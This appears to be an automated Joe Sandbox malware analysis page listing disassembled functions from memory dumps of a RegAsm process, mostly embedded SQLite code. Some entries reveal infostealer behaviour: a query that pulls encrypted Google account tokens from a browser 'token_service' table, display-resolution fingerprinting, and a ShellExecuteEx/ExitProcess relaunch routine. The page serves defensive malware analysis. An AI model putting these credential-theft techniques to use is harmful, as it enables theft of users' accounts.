Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: PRAGMA %Q.page_size$SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1$undersize RTree blobs in "%q_node"
API String ID: 0-3485589083
Opcode ID: 9ab5841f373dba346fd1448ecabff033e8073498d180710f7a01801f8d9446d5
Instruction ID: 8be553cf303e28fbbb898572df56f8e8c7d571fcf41dd9dac2866e8d202b359d
Opcode Fuzzy Hash: 9ab5841f373dba346fd1448ecabff033e8073498d180710f7a01801f8d9446d5
Instruction Fuzzy Hash: D53165B1A00235AFEB008F30CC94A57BBB8FB44755F0C4665FD8993251E736E956CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00414500 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041452E
memset.MSVCRT ref: 0041453A
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000000), ref: 0041454F

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

ShellExecuteEx.SHELL32(0000003C), ref: 004145F1
memset.MSVCRT ref: 004145FE
memset.MSVCRT ref: 00414610
ExitProcess.KERNEL32 ref: 00414621

Strings

<, xrefs: 004145C9

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: memset$lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1943017432-4251816714
Opcode ID: fa61bad28b9fa6bf749e961c07963be30b3881d2093b9f200ee653d6053f849b
Instruction ID: 40106b6c34474a18d672d20360bd6d15e979737cd144eebdb7cb1047f618d409
Opcode Fuzzy Hash: fa61bad28b9fa6bf749e961c07963be30b3881d2093b9f200ee653d6053f849b
Instruction Fuzzy Hash: E43150B1C00248EBDB04EFA5CC91EEEBBB8AF19304F50415EF20577182DB785A48CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00410C10 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(012B2F30,00000000,00000000,00000000), ref: 00410C2A
GetDeviceCaps.GDI32(00000000,00000008), ref: 00410C35
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00410C40
ReleaseDC.USER32(00000000,00000000), ref: 00410C4B
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000001,?,?,00415FBA,?,00000000,?,Display Resolution: ,00000000,?,00428460,00000000), ref: 00410C58
HeapAlloc.KERNEL32(00000000,?,?,00000001,?,?,00415FBA,?,00000000,?,Display Resolution: ,00000000,?,00428460,00000000,?), ref: 00410C5F
wsprintfA.USER32 ref: 00410C6F

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Strings

%dx%d, xrefs: 00410C69

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
String ID: %dx%d
API String ID: 3940144428-2206825331
Opcode ID: fa3c6274f822142a20cc3ebfe296ed34c019a70a2d3d3122d6912a561d387fb8
Instruction ID: 10970bef041411397078d824575da1c8168c4890c013ef65725a28c434970ae3
Opcode Fuzzy Hash: fa3c6274f822142a20cc3ebfe296ed34c019a70a2d3d3122d6912a561d387fb8
Instruction Fuzzy Hash: D101D6357413107BE32027A5AC0EF5B7A9EEB0AB52F500015FB04D71D0CAB0180087E9

Uniqueness

Uniqueness Score: -1.00%

Function 19B632F0 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 464COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19B636C7, 19B6370C, 19B6376C, 19B6381D
database corruption, xrefs: 19B636C2, 19B63707, 19B63767, 19B63818
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19B636B8, 19B636FD, 19B6375D, 19B6380E

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: ef4b6e1f3be2368bb0a414c1132e2072e23b3a34b91fd2688254695c60a7cfd8
Instruction ID: a929fe6c8dd54f3c663e0091ce8819dec674817f597f0b0b89d514bf6c56c495
Opcode Fuzzy Hash: ef4b6e1f3be2368bb0a414c1132e2072e23b3a34b91fd2688254695c60a7cfd8
Instruction Fuzzy Hash: 7CF149756056619FD700CF29C880BA7BBE1FF44314F4C419DE988872A2E732F956C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 19A928E5 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 346COMMON

Download Yara Rule

Strings

INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');, xrefs: 19A929F1
malformed inverted index for FTS5 table %s.%s, xrefs: 19A92A8A
unable to validate the inverted index for FTS5 table %s.%s: %s, xrefs: 19A92AA0

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');$malformed inverted index for FTS5 table %s.%s$unable to validate the inverted index for FTS5 table %s.%s: %s
API String ID: 0-3572959941
Opcode ID: 65158737e3718db58a8c76db03c470f98bc2886860a442cd6a900202adf655b2
Instruction ID: d3bf60c20e92d4fbe4ab89f5d03a96058755b697b54e398efc8e9a5d1cb9b2fc
Opcode Fuzzy Hash: 65158737e3718db58a8c76db03c470f98bc2886860a442cd6a900202adf655b2
Instruction Fuzzy Hash: 0E411472901274ABD3108F38DC88EA777ECFF40A55F080169FD8A83141E731965ACBA7

Uniqueness

Uniqueness Score: -1.00%

Function 19A79700 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 277COMMON

Download Yara Rule

Strings

(FK), xrefs: 19A798D3

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: (FK)
API String ID: 0-1642768157
Opcode ID: cc04d7fe94895ac55f65909daf461fc0e1cbeca2e95c7f6aac1325b374201e1c
Instruction ID: eceb366288a86a8d3c1748c57267f9c000bdfed209e809ca7805194abd9f7f17
Opcode Fuzzy Hash: cc04d7fe94895ac55f65909daf461fc0e1cbeca2e95c7f6aac1325b374201e1c
Instruction Fuzzy Hash: 6981C0767053009FE7049F28EC41B66F7A1FB84636F2846AFE64A966E1E733E414CB50

Uniqueness

Uniqueness Score: -1.00%

Function 19A8EB00 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 187COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19A8ECDA
database corruption, xrefs: 19A8ECD5
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19A8ECCB
%.*s%s, xrefs: 19A8EC88

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %.*s%s$%s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-894757972
Opcode ID: fe5a7a414196c143111f6bca14b667a67b3a9ced1c51c66128d282648821e110
Instruction ID: ea039e63c5e1b697ea7a5d82415728d38159d873777fab4438e6b5594591e98c
Opcode Fuzzy Hash: fe5a7a414196c143111f6bca14b667a67b3a9ced1c51c66128d282648821e110
Instruction Fuzzy Hash: A76101B4A04351CBD714DF24C884A9BB7E9BF84B05F28896DED499B390E731F909CB81

Uniqueness

Uniqueness Score: -1.00%

Function 19A69DA0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

[%!g,%!g]], xrefs: 19A69EC0
[%!g,%!g],, xrefs: 19A69E7E

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: [%!g,%!g],$[%!g,%!g]]
API String ID: 0-3388633204
Opcode ID: 62360bb4dc0200cd62209f0713c40dfabca27898316b6a3cb8a5c09b89d30135
Instruction ID: 10fd1ca1029472dd43c23f145cba63c25785045aca49bde8de0cfc1372914e91
Opcode Fuzzy Hash: 62360bb4dc0200cd62209f0713c40dfabca27898316b6a3cb8a5c09b89d30135
Instruction Fuzzy Hash: 5E512630900B158BD700CF29CDC4B97B7B5BF81B44F088669F88A9B2A1F771A459CB93

Uniqueness

Uniqueness Score: -1.00%

Function 19A8F330 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 126COMMON

Download Yara Rule

Strings

INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');, xrefs: 19A8F33F
unable to validate the inverted index for FTS%d table %s.%s: %s, xrefs: 19A8F418
malformed inverted index for FTS%d table %s.%s, xrefs: 19A8F3F3

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');$malformed inverted index for FTS%d table %s.%s$unable to validate the inverted index for FTS%d table %s.%s: %s
API String ID: 0-2809892521
Opcode ID: c198689d093f64db3c75609cd2749cf9cb079e6bc2c5581d2588ff0a409d6fe6
Instruction ID: 4f0e1bf51eae618ff0f7355654753b73c1329ba7e66ec261df08920d271d045e
Opcode Fuzzy Hash: c198689d093f64db3c75609cd2749cf9cb079e6bc2c5581d2588ff0a409d6fe6
Instruction Fuzzy Hash: DE4135719012769BE300DB35EC88A9B376CEF40A56F08446AFE8AC3145E731955ACBE7

Uniqueness

Uniqueness Score: -1.00%

Function 00408EB0 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 340stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 004070D0: memcmp.MSVCRT ref: 0040710B
Part of subcall function 004070D0: memset.MSVCRT ref: 00407139
Part of subcall function 004070D0: LocalAlloc.KERNEL32(00000040,?), ref: 00407170

lstrlen.KERNEL32(00000000), ref: 00409105

Part of subcall function 00411750: LocalAlloc.KERNEL32(00000040,?,00000000,00000001,00000004,?,00413F63,00000000,00000000), ref: 0041176C

StrStrA.SHLWAPI(00000000,AccountId), ref: 0040912B
lstrlen.KERNEL32(00000000), ref: 00409214
lstrlen.KERNEL32(00000000), ref: 00409228

Strings

GoogleAccounts, xrefs: 00408EF6
SELECT service, encrypted_token FROM token_service, xrefs: 00409069
GoogleAccounts, xrefs: 00408F7A
AccountId, xrefs: 00409125

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
API String ID: 2910778473-1713091031
Opcode ID: 7843d1ef2307267bca2605904175fa092510784e571902047d6404226b4667fd
Instruction ID: c4cb561b851d9ad46cf7f56b89ea9e95a2426b849739b0bc6f678560fdc0b582
Opcode Fuzzy Hash: 7843d1ef2307267bca2605904175fa092510784e571902047d6404226b4667fd
Instruction Fuzzy Hash: 09D18271805248EACB14E7E5D955BDDBBB8AF19308F1440AEF906B3282DF785B08C779

Uniqueness

Uniqueness Score: -1.00%

Function 19A830F0 Relevance: 12.2, APIs: 8, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59a0d97ca3bd193c9f836c03932417672e2c34f5964bfea1d1bd974f269b793f
Instruction ID: 5cfd80d54661e53440a86f3ab2f03904635ee6a04410d752cfe77f59addc669b
Opcode Fuzzy Hash: 59a0d97ca3bd193c9f836c03932417672e2c34f5964bfea1d1bd974f269b793f
Instruction Fuzzy Hash: 91519276608200AFDB41EB68FC04EAB7BE2EF85720F0D85A8F558872F1E731D9559B41

Uniqueness

Uniqueness Score: -1.00%

Function 19A7B6E0 Relevance: 12.1, APIs: 8, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6ebcd71f15ec552e65a43f4d5dcbaf9f75175734902c39f8226d61d71128330
Instruction ID: 34617f4642452f826f2628678f2e9a6ac3ed5687deebda872b5de4cce1c28cbf
Opcode Fuzzy Hash: c6ebcd71f15ec552e65a43f4d5dcbaf9f75175734902c39f8226d61d71128330
Instruction Fuzzy Hash: 5411E9F99042007FD6049B24ED41E6B7BB9FF91B04F488459F84587270E736F91D92A2

Uniqueness

Uniqueness Score: -1.00%

Function 19AD7920 Relevance: 10.8, APIs: 7, Instructions: 338COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
Instruction ID: cf59a871d1683444eef3ccf276b67b4ba72a991c58e68f23d6f1d28f8a6dd44f
Opcode Fuzzy Hash: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
Instruction Fuzzy Hash: F1B1D1B1A04342AFC304CF29CC81A5ABBE9FF88A14F48552DF959D3751E735F9188B91

Uniqueness

Uniqueness Score: -1.00%

Function 19A75930 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 234COMMON

Download Yara Rule

Strings

CREATE TABLE x(input, token, start, end, position), xrefs: 19A75933
simple, xrefs: 19A75A38, 19A75A84, 19A75A95, 19A75B27
unknown tokenizer: %s, xrefs: 19A75B28

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
